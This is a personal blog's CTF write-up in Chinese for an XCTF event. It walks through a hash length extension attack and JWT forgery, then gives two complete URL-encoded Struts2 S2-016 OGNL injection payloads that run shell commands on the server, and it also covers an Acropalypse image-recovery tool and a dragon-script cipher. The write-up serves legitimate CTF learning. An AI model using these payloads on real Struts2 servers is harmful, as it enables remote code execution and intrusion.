Z1d10tのBlog

A note for myself,have fun!

XCTF简单记录

Z1d10t's Avatar 2023-07-31 各赛事WP

分享本文
  1. 1. WEB
    1. 1.1. jwt2struts
  2. 2. Misc
    1. 2.1. snippingTools
    2. 2.2. old language

web狗没啥参与感

WEB

web就一道题目

jwt2struts

考点:

哈希长度扩展攻击 jwt伪造 structs2 s2-016

源码发现JWT_key.php

获得源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php
  highlight_file(__FILE__);
include "./secret_key.php";
include "./salt.php";
//$salt = XXXXXXXXXXXXXX // the salt include 14 characters
//md5($salt."adminroot")=e6ccbf12de9d33ec27a5bcfb6a3293df
@$username = urldecode($_POST["username"]);
@$password = urldecode($_POST["password"]);
if (!empty($_COOKIE["digest"])) {
  if ($username === "admin" && $password != "root") {
    if ($_COOKIE["digest"] === md5($salt.$username.$password)) {
      die ("The secret_key is ". $secret_key);
    }
    else {
      die ("Your cookies don't match up! STOP HACKING THIS SITE.");
    }
  }
  else {
    die ("no no no");
  }
}

大致浏览 就是要么我们能得到他的盐值 要么输入密码为root 但是又不容许我们输入密码为root

总之就是要让$_COOKIE["digest"] === md5($salt.$username.$password)成立

直接用hashpump参考https://blog.csdn.net/jblock/article/details/78448143?ops_request_misc=&request_id=&biz_id=102&utm_term=hashpump&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduweb~default-0-78448143.nonecase&spm=1018.2226.3001.4187

img

得到之后打入

img

得到jwt的key为sk-he00lctf3r然后伪造登录

发现源码提示 do you know struts2?

当用户提交 age 为字符串而非整形数值时,后端用代码拼接 “‘“ + value + “‘“ 然后对其进行 OGNL 表达式解析。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似 SQLi 注入单引号拼接的方式即可注入任意 OGNL 表达式

官方wp是在age注入%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27printenv+FLAG%27%29.getInputStream%28%29%29%29+%2B+%27 但是我之后复现没成功 没有回显

但是我的payload是这样 可能是非预期 来源 https://xz.aliyun.com/t/4603

1
/admiiiiiiiiiiin/user.action?redirect:%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23f.setAccessible%28true%29%2C%23f.set%28%23_memberAccess%2Ctrue%29%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27cat /flag%27%29.getInputStream%28%29%29%7D

img

Misc

snippingTools

CVE-2023-28303

比赛的时候找到工具了 没试 我TM。。。。

https://github.com/frankthetank-music/Acropalypse-Multi-Tool 直接用工具梭哈恢复就行了

img

old language

img

太离谱了这个

龙语,游戏《上古卷轴V:天际》中出现的语言

img

*ctf{GIKRVZY}

本文最后更新于 天前,文中所描述的信息可能已发生改变

本文发表于 

各赛事WP